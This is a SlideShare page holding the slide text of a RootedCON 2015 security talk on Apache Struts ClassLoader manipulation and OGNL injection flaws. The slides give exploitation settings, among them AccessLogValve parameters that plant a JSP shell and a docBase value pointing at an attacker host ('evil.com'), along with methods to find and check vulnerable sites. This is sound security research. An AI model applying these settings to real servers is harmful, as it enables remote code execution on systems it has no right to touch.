SlideShare una empresa de Scribd logo

RootedCON 2015 - Deep inside the Java framework Apache Struts

T
testpurposes

Slides for the talk given at RootedCON 2015 security conference by Julián Vilas (security analyst and researcher). The goal of the talk was giving a view on the security of the Apache Struts framework.

Tecnología
1 de 43
Descargar para leer sin conexión
Deep  inside  the  Java   framework     Apache  Struts       Julián  Vilas  
Whoami   •  Julián  Vilas  (Redsadic)   – @julianvilas   •  Security  Analyst  &  Researcher    
¿Apache  Struts?   Java  framework   – for  Java  webapps   – Two  major  versions   • Struts  1.x  (EoL  since  2013)   • Struts  2.x  
Why  Struts?   •  (Mar  2014)  CVE-­‐2014-­‐0094  goes  public   •  What  the  hell  was  it?   – Struts  2  vulnerability   – UnauthenVcated   – All  versions  affected   – Could  lead  to  RCE  
CVE-­‐2014-­‐0094   “ParametersInterceptor  allows  access  to  'class'   parameter  which  is  directly  mapped  to  getClass()   method  and  allows  ClassLoader  manipulaVon”     •  Credits:   –  Peter  Magnusson   –  Przemysław  Celej   •  A^er  reading  it…   –  Let’s  go  learning  some  basics  
OGNL   Object  Graph  NavigaVon  Language     •  Expression  Language  for  gedng  and  sedng   properVes  of  Java  objects   – Objects  that  are  stored  in  the  Context    
top   OGNL   #foo.dummy     //  foo.getDummy()     #bar.dummy   //  bar.getDummy()     dummy   //  qux.getDummy()     dummy  =  “RootedCON”   //  qux.setDummy(“RootedCON”)   foo   bar   baz   qux   Context   root   foo   bar   qux   ….   Struts2  OGNL  Context   (AcDonContext)   ValueStack  
Struts  2  request  processing       1 7 Filter     Dispatcher   Interceptors   AcVon   Result   /example/hello.acDon   HTML   1 7 User   2 3 4 56 hMp://struts.example.com/example/hello.acDon   HTML   ParametersInterceptor   Struts2  app  
ParametersInterceptor   “This  interceptor  gets  all  parameters  from   AcVonContext.getParameters()  and  sets  them  on   the  value  stack  by  calling   ValueStack.setValue(String,  Object)”   “Because  parameter  names  are  effecDvely  OGNL   statements,  it  is  important  that  security  be  taken   into  account”   hpp://struts.apache.org/release/2.0.x/struts2-­‐core/apidocs/com/opensymphony/xwork2/interceptor/ ParametersInterceptor.html    
ParametersInterceptor  example   …   HelloWorldAcVon   …   AcDonContext   ValueStack   PUSH   LOOKUP   SETTER   SET  
ParametersInterceptor  example  
Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   ?   AcDonSupport   EXTENDS  
AcVonSupport  methods  
Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS  
AcVonSupport  
Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS   …   getClass()   …   Object   EXTENDS  
NavigaVng  objects             •  Parameters  are  evaluated  iteraVvely  as  an  AST   chain,  composed  by   – A  chain  of  gepers  (without  parameters)   – Ending  with  a  seper  (1  String,  boolean  or  int   parameter)    
Looking  for  sepers   •  Through  object  navigaVon  reach  several  seper   methods  not  part  of  the  AcVon  can  be  reached   –  What  methods?   •  Post  published  by  neobyte       hpp://sec.baidu.com/index.php?research/detail/id/18     1.  PoC  for  gedng  reachable  sepers   2.  A  method  for  gedng  RCE  on  Tomcat  8    
DEMO   Struts  Tester  on   Tomcat  6  /  7  &  Tomcat  8     customized  &  commented  version  ready  to  use   hpps://github.com/julianvilas/rooted2k15  
Exploitability   Tested  against:     •  Tomcat  6  /  7  à  RCE  via  “docBase”  (win  only)   •  Tomcat  8  à  RCE  via  “AccessLogValve”   •  Glassfish  4  à  RCE  via  “docBase”  (win  only)   •  Websphere  8.5  (developer)  à  RCE  not  found   •  Weblogic  10  &  12  à  RCE  not  found   •  JBOSS  7.1  &  7.4  à  RCE  not  found  
What  about  Struts  1   •  According  to  CVE-­‐2014-­‐0114,  Struts  1  is  also  vulnerable   •  Unpatched!  (struts  1  is  over  EoL,  but  is  sVll  in  use)     •  Different  reason:  Struts  1  no  OGNL  nor  Value  Stack   –  The  key:  bean  populaVon  with  BeanUVls       •  You  can  find  some  Alvaro  Muñoz  (@pwntester)  gold,  like   further  explanaVon  and  a  filter  to  be  applied  as  a   workaround,  at   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Protect-­‐your-­‐ Struts1-­‐applicaVons/ba-­‐p/6463188#.VBMB0i5_s0z   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Update-­‐your-­‐ Struts-­‐1-­‐ClassLoader-­‐manipulaVon-­‐filters/ba-­‐p/6639204#.VOsFG7CG_8Q  
AccessLogValve  exploitaVon             A  log  file  with  name  shell1.jsp  is  created  at  webapps/ROOT.   When  requesVng  a  inexistent  URL,  it’s  logged  into  the  log  file   (that  it’s  going  to  be  interpreted  as  a  JSP  when  get  accessed).   .directory=webapps/ROOT     .prefix=shell   .suffix=.jsp   .fileDateFormat=1   1 2 3 4
DEMO     AccessLogValve  exploitaVon     hpps://github.com/rapid7/metasploit-­‐framework/blob/master/modules/exploits/ mulV/hpp/struts_code_exec_classloader.rb  
docBase  exploitaVon   •  “The  Document  Base  (also  known  as  the  Context   Root)  directory  for  this  web  applicaVon,  or  the   pathname  to  the  web  applicaDon  archive  file  (if  this   web  applicaVon  is  being  executed  directly  from  the   WAR  file).”   •  Legit  applicaVon  goes  down   .docBase=//evil.com/shared    
About  metasploit  module   •  Tomcat  6/7  &  GlassFish  (docBase)     – Only  Win     – Not  landed  yet  in  trunk  but  works  fine   – Maphew  Hall  (0x41414141)  pull  requests:   hpps://github.com/rapid7/metasploit-­‐framework/pull/3074   hpps://github.com/rapid7/metasploit-­‐framework/pull/3075   hpps://github.com/rapid7/metasploit-­‐framework/pull/3323     – Same  module  than  before,  landed  yesterday  night  
DEMO   docBase  exploitaVon    
I  know  Kung-­‐fu                     •  Now  what?  
Searching  Struts  sites   •  Dumb  detecVon  of  Struts  2  sites   – Default  extension  for  Struts  2:  “.acVon”   •  Also,  when  default  configured,  it  accepts  both  “.acVon”   and  no  extension      
Searching  Struts  sites  
Searching  Struts  sites  
Searching  Struts  sites   •  Dumb  detecVon  of  Struts  1  sites     – Default  extension  for  Struts  1:  “.do”    
Searching  Struts  sites   hpps://web.archive.org/web/20060519001958/hpp://simonpeter.com/technology/ java/struts/sites.html  
Vulnerability  checking   •  To  check  if  a  Struts  2  site  is  vulnerable,  modify   “cacheMaxSize”  property   –  Integer.MAX_VALUE  ==  2147483647  (in  x86)             •  Tomcat  6/7  &  Glassfish   •  Tomcat  8       2147483647   2147483648   AAAAAAAAA  
Vulnerability  checking   •  In  Struts  1  if  the  conversion  String  to  Integer   fails  a  default  value  0  is  set   •  But  when  trying  to  set  a  method  that  receives   an  Object  with  a  String,  a  excepVon  is  raised       ROOTEDCON  
OK  I  see,  but…        
Previous  security  bulleVns         RCE,  when  form  validaDon  fails  field  values   are  interpreted  as  OGNL     RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL   RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL  !  S2-­‐003  fix  was  incomplete   RCE,  user’s  input  is  evaluated  as  OGNL  when   there’s  a  conversion  error   Several  RCE:  via  ExcepDonDelegator  (same   as  S2-­‐007),  CookieInterceptor  (same  idea   than  S2-­‐003  and  S2-­‐005),  etc.   RCE,  incomplete  fix  for  S2-­‐003  and  S2-­‐005  on   ParametersInterceptor    
Previous  security  bulleVns         RCE,  incomplete  fix  for  S2-­‐003,  S2-­‐005  and   S2-­‐009  on  ParametersInterceptor  when   using  values  for  redirecDons   RCE,  s:url  and  s:a  tags,  when   "includeParams"  is  set,  allow  evaluaDng  the   values  of  request  parameters  as  OGNL.   RCE,  same  than  S2-­‐013,  incomplete  fix.   RCE,  acDons  using  wildcards  and  Double   OGNL  evaluaDon  allow  OGNL  injecDon   RCE:  DefaultAcDonMapper  short-­‐circuit   navigaDon  interpreted  as  OGNL   RCE,  what  we  saw  in  this  presentaDon  ☺   (ParametersInterceptor)     RCE,  Incomplete  fix  for  S2-­‐020   Incomplete  fix  for  S2-­‐020  and  S2-­‐021  
Previous  security  bulleVns        
Conclusions?   •  Seven  years  from  between  S2-­‐001  and  S2-­‐020   •  Same  kind  of  vulnerabiliVes:  injecDng  OGNL   from  user-­‐supplied  data     •  Several  bypasses  for  fixes   •  Almost  all  RCE       •  Take  your  own…  
Bonus  track  -­‐  Confluence   •  Is  based  on  a  WebWork  fork  (previous  than  Struts  2)   •  If  you  look  their  bulleVns   –  Versions  up  to  and  including  5.5.1  vulnerable  to   ClassLoader  manipulaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory +2014-­‐05-­‐21     –  Versions  up  to  5.6  (before  5.6.6  and  5.5.7)  are  vulnerable   to  double  OGNL  evaluaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-­‐ +2015-­‐01-­‐21   •  Don’t  they  look  familiar?  J  
Bonus  track  -­‐  Confluence  
QuesVons?   •  You  can  ask  also  :   – Poke  me  around   – by  twiper:  @julianvilas        
QuesVons?   •  And  what  do  you  think  about  OGNL?     Thanks  for  aMending!!!  ☺  

Recomendados

Oracle Database performance tuning using oratop
Oracle Database performance tuning using oratopOracle Database performance tuning using oratop
Oracle Database performance tuning using oratop
Sandesh Rao
 
Use case diagram
Use case diagramUse case diagram
Use case diagram
Raz Friman
 
DevNexus 2019: Migrating to Java 11
DevNexus 2019: Migrating to Java 11DevNexus 2019: Migrating to Java 11
DevNexus 2019: Migrating to Java 11
DaliaAboSheasha
 
Spring AOP
Spring AOPSpring AOP
Spring AOP
Jeroen Rosenberg
 
B35 Inside rac by Julian Dyke
B35 Inside rac by Julian DykeB35 Inside rac by Julian Dyke
B35 Inside rac by Julian Dyke
Insight Technology, Inc.
 
Oracle statistics by example
Oracle statistics by exampleOracle statistics by example
Oracle statistics by example
Mauro Pagano
 
Inchinare-Si-Distractie.pdf
Inchinare-Si-Distractie.pdfInchinare-Si-Distractie.pdf
Inchinare-Si-Distractie.pdf
AlexGhiurau2
 
Understanding the Sitecore Architecture
Understanding the Sitecore ArchitectureUnderstanding the Sitecore Architecture
Understanding the Sitecore Architecture
Pieter Brinkman
 

Recomendados

Oracle Database performance tuning using oratop
Oracle Database performance tuning using oratopOracle Database performance tuning using oratop
Oracle Database performance tuning using oratop
Sandesh Rao
 
Use case diagram
Use case diagramUse case diagram
Use case diagram
Raz Friman
 
DevNexus 2019: Migrating to Java 11
DevNexus 2019: Migrating to Java 11DevNexus 2019: Migrating to Java 11
DevNexus 2019: Migrating to Java 11
DaliaAboSheasha
 
Spring AOP
Spring AOPSpring AOP
Spring AOP
Jeroen Rosenberg
 
B35 Inside rac by Julian Dyke
B35 Inside rac by Julian DykeB35 Inside rac by Julian Dyke
B35 Inside rac by Julian Dyke
Insight Technology, Inc.
 
Oracle statistics by example
Oracle statistics by exampleOracle statistics by example
Oracle statistics by example
Mauro Pagano
 
Inchinare-Si-Distractie.pdf
Inchinare-Si-Distractie.pdfInchinare-Si-Distractie.pdf
Inchinare-Si-Distractie.pdf
AlexGhiurau2
 
Understanding the Sitecore Architecture
Understanding the Sitecore ArchitectureUnderstanding the Sitecore Architecture
Understanding the Sitecore Architecture
Pieter Brinkman
 
Always on in SQL Server 2012
Always on in SQL Server 2012Always on in SQL Server 2012
Always on in SQL Server 2012
Fadi Abdulwahab
 
Laravel intake 37 all days
Laravel intake 37 all daysLaravel intake 37 all days
Laravel intake 37 all days
Ahmed Abd El Ftah
 
Introducing the eDB360 Tool
Introducing the eDB360 ToolIntroducing the eDB360 Tool
Introducing the eDB360 Tool
Carlos Sierra
 
Deploying a 3 tier application using docker
Deploying a 3 tier application using dockerDeploying a 3 tier application using docker
Deploying a 3 tier application using docker
parth2094
 
ウイルス検知プログラミング
ウイルス検知プログラミングウイルス検知プログラミング
ウイルス検知プログラミング
黒 林檎
 
IBM Shopz user registration
IBM Shopz user registrationIBM Shopz user registration
IBM Shopz user registration
Eugenia Etchegoyen
 
AzureAD for Java
AzureAD for JavaAzureAD for Java
AzureAD for Java
Yoshio Terada
 
Deep review of LMS process
Deep review of LMS processDeep review of LMS process
Deep review of LMS process
Riyaj Shamsudeen
 
How to connect redis and mule esb using spring data redis module
How to connect redis and mule esb using spring data redis moduleHow to connect redis and mule esb using spring data redis module
How to connect redis and mule esb using spring data redis module
Priyobroto Ghosh (Mule ESB Certified)
 
The Oracle RAC Family of Solutions - Presentation
The Oracle RAC Family of Solutions - PresentationThe Oracle RAC Family of Solutions - Presentation
The Oracle RAC Family of Solutions - Presentation
Markus Michalewicz
 
Ash masters : advanced ash analytics on Oracle
Ash masters : advanced ash analytics on Oracle Ash masters : advanced ash analytics on Oracle
Ash masters : advanced ash analytics on Oracle
Kyle Hailey
 
Oracle Data Integrator Cloud Serviceユーザーズガイド
Oracle Data Integrator Cloud ServiceユーザーズガイドOracle Data Integrator Cloud Serviceユーザーズガイド
Oracle Data Integrator Cloud Serviceユーザーズガイド
オラクルエンジニア通信
 
Chromium에 contribution하기
Chromium에 contribution하기Chromium에 contribution하기
Chromium에 contribution하기
규영 허
 
Oracle Data Guard for Beginners
Oracle Data Guard for BeginnersOracle Data Guard for Beginners
Oracle Data Guard for Beginners
Pini Dibask
 
Understanding oracle rac internals part 1 - slides
Understanding oracle rac internals part 1 - slidesUnderstanding oracle rac internals part 1 - slides
Understanding oracle rac internals part 1 - slides
Mohamed Farouk
 
Oracle SQL Tuning for Day-to-Day Data Warehouse Support
Oracle SQL Tuning for Day-to-Day Data Warehouse SupportOracle SQL Tuning for Day-to-Day Data Warehouse Support
Oracle SQL Tuning for Day-to-Day Data Warehouse Support
nkarag
 
Step by step installation of oracle19c (19.3.0.0.0) on windows 2016
Step by step installation of oracle19c (19.3.0.0.0) on windows 2016Step by step installation of oracle19c (19.3.0.0.0) on windows 2016
Step by step installation of oracle19c (19.3.0.0.0) on windows 2016
Jorge Batista
 
Oracle Performance Tools of the Trade
Oracle Performance Tools of the TradeOracle Performance Tools of the Trade
Oracle Performance Tools of the Trade
Carlos Sierra
 
Unity and WebSockets
Unity and WebSocketsUnity and WebSockets
Unity and WebSockets
Josh Glover
 
How to find what is making your Oracle database slow
How to find what is making your Oracle database slowHow to find what is making your Oracle database slow
How to find what is making your Oracle database slow
SolarWinds
 
Charla Rooted2k15
Charla Rooted2k15Charla Rooted2k15
Charla Rooted2k15
skuater
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET Application
Iron Speed
 

Más contenido relacionado

La actualidad más candente

Introducing the eDB360 Tool
Introducing the eDB360 ToolIntroducing the eDB360 Tool
Introducing the eDB360 Tool
Carlos Sierra
 
Unity and WebSockets
Unity and WebSocketsUnity and WebSockets
Unity and WebSockets
Josh Glover
 

La actualidad más candente (20)

Always on in SQL Server 2012
Always on in SQL Server 2012Always on in SQL Server 2012
Always on in SQL Server 2012
 
Laravel intake 37 all days
Laravel intake 37 all daysLaravel intake 37 all days
Laravel intake 37 all days
 
Introducing the eDB360 Tool
Introducing the eDB360 ToolIntroducing the eDB360 Tool
Introducing the eDB360 Tool
 
Deploying a 3 tier application using docker
Deploying a 3 tier application using dockerDeploying a 3 tier application using docker
Deploying a 3 tier application using docker
 
ウイルス検知プログラミング
ウイルス検知プログラミングウイルス検知プログラミング
ウイルス検知プログラミング
 
IBM Shopz user registration
IBM Shopz user registrationIBM Shopz user registration
IBM Shopz user registration
 
AzureAD for Java
AzureAD for JavaAzureAD for Java
AzureAD for Java
 
Deep review of LMS process
Deep review of LMS processDeep review of LMS process
Deep review of LMS process
 
How to connect redis and mule esb using spring data redis module
How to connect redis and mule esb using spring data redis moduleHow to connect redis and mule esb using spring data redis module
How to connect redis and mule esb using spring data redis module
 
The Oracle RAC Family of Solutions - Presentation
The Oracle RAC Family of Solutions - PresentationThe Oracle RAC Family of Solutions - Presentation
The Oracle RAC Family of Solutions - Presentation
 
Ash masters : advanced ash analytics on Oracle
Ash masters : advanced ash analytics on Oracle Ash masters : advanced ash analytics on Oracle
Ash masters : advanced ash analytics on Oracle
 
Oracle Data Integrator Cloud Serviceユーザーズガイド
Oracle Data Integrator Cloud ServiceユーザーズガイドOracle Data Integrator Cloud Serviceユーザーズガイド
Oracle Data Integrator Cloud Serviceユーザーズガイド
 
Chromium에 contribution하기
Chromium에 contribution하기Chromium에 contribution하기
Chromium에 contribution하기
 
Oracle Data Guard for Beginners
Oracle Data Guard for BeginnersOracle Data Guard for Beginners
Oracle Data Guard for Beginners
 
Understanding oracle rac internals part 1 - slides
Understanding oracle rac internals part 1 - slidesUnderstanding oracle rac internals part 1 - slides
Understanding oracle rac internals part 1 - slides
 
Oracle SQL Tuning for Day-to-Day Data Warehouse Support
Oracle SQL Tuning for Day-to-Day Data Warehouse SupportOracle SQL Tuning for Day-to-Day Data Warehouse Support
Oracle SQL Tuning for Day-to-Day Data Warehouse Support
 
Step by step installation of oracle19c (19.3.0.0.0) on windows 2016
Step by step installation of oracle19c (19.3.0.0.0) on windows 2016Step by step installation of oracle19c (19.3.0.0.0) on windows 2016
Step by step installation of oracle19c (19.3.0.0.0) on windows 2016
 
Oracle Performance Tools of the Trade
Oracle Performance Tools of the TradeOracle Performance Tools of the Trade
Oracle Performance Tools of the Trade
 
Unity and WebSockets
Unity and WebSocketsUnity and WebSockets
Unity and WebSockets
 
How to find what is making your Oracle database slow
How to find what is making your Oracle database slowHow to find what is making your Oracle database slow
How to find what is making your Oracle database slow
 

Destacado

Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksQueue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
CSCJournals
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
Amanda Rousseau
 
Top 10 agile project interview questions and answers
Top 10 agile project interview questions and answersTop 10 agile project interview questions and answers
Top 10 agile project interview questions and answers
WhitneyHouston012
 

Destacado (16)

Charla Rooted2k15
Charla Rooted2k15Charla Rooted2k15
Charla Rooted2k15
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET Application
 
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
 
Real Life Information Security
Real Life Information SecurityReal Life Information Security
Real Life Information Security
 
Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksQueue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
 
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSSSETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
 
Top 10 agile project interview questions and answers
Top 10 agile project interview questions and answersTop 10 agile project interview questions and answers
Top 10 agile project interview questions and answers
 
Passive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overviewPassive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overview
 
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 

Similar a RootedCON 2015 - Deep inside the Java framework Apache Struts

Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Lucidworks
 
Apache ZooKeeper TechTuesday
Apache ZooKeeper TechTuesdayApache ZooKeeper TechTuesday
Apache ZooKeeper TechTuesday
Andrei Savu
 
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Paul King
 
Orchestrate Your Choreography
Orchestrate Your ChoreographyOrchestrate Your Choreography
Orchestrate Your Choreography
Daniel Pokusa
 
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
Databricks
 

Similar a RootedCON 2015 - Deep inside the Java framework Apache Struts (20)

#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"
#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"
#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"
 
Big Search with Big Data Principles
Big Search with Big Data PrinciplesBig Search with Big Data Principles
Big Search with Big Data Principles
 
ApacheCon Europe 2012 -Big Search 4 Big Data
ApacheCon Europe 2012 -Big Search 4 Big DataApacheCon Europe 2012 -Big Search 4 Big Data
ApacheCon Europe 2012 -Big Search 4 Big Data
 
Solr Troubleshooting - TreeMap approach
Solr Troubleshooting - TreeMap approachSolr Troubleshooting - TreeMap approach
Solr Troubleshooting - TreeMap approach
 
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
 
Code transformation With Spoon
Code transformation With SpoonCode transformation With Spoon
Code transformation With Spoon
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos Engineering
 
The Diabolical Developer's Guide to Surviving Java 9
The Diabolical Developer's Guide to Surviving Java 9The Diabolical Developer's Guide to Surviving Java 9
The Diabolical Developer's Guide to Surviving Java 9
 
Arquillian in a nutshell
Arquillian in a nutshellArquillian in a nutshell
Arquillian in a nutshell
 
55j7
55j755j7
55j7
 
Apache ZooKeeper TechTuesday
Apache ZooKeeper TechTuesdayApache ZooKeeper TechTuesday
Apache ZooKeeper TechTuesday
 
Arquillian in a nutshell
Arquillian in a nutshellArquillian in a nutshell
Arquillian in a nutshell
 
PROGRAMMING IN JAVA-unit 3-part II
PROGRAMMING IN JAVA-unit 3-part IIPROGRAMMING IN JAVA-unit 3-part II
PROGRAMMING IN JAVA-unit 3-part II
 
Mule memory leak issue
Mule memory leak issueMule memory leak issue
Mule memory leak issue
 
Struts2.x
Struts2.xStruts2.x
Struts2.x
 
SFBay Area Solr Meetup - June 18th: Benchmarking Solr Performance
SFBay Area Solr Meetup - June 18th: Benchmarking Solr PerformanceSFBay Area Solr Meetup - June 18th: Benchmarking Solr Performance
SFBay Area Solr Meetup - June 18th: Benchmarking Solr Performance
 
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
 
Orchestrate Your Choreography
Orchestrate Your ChoreographyOrchestrate Your Choreography
Orchestrate Your Choreography
 
Back to the future with Java 7 (Geekout June/2011)
Back to the future with Java 7 (Geekout June/2011)Back to the future with Java 7 (Geekout June/2011)
Back to the future with Java 7 (Geekout June/2011)
 
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
 

Último

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
 

Último (20)

Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Real Time Object Detection Using Open CV
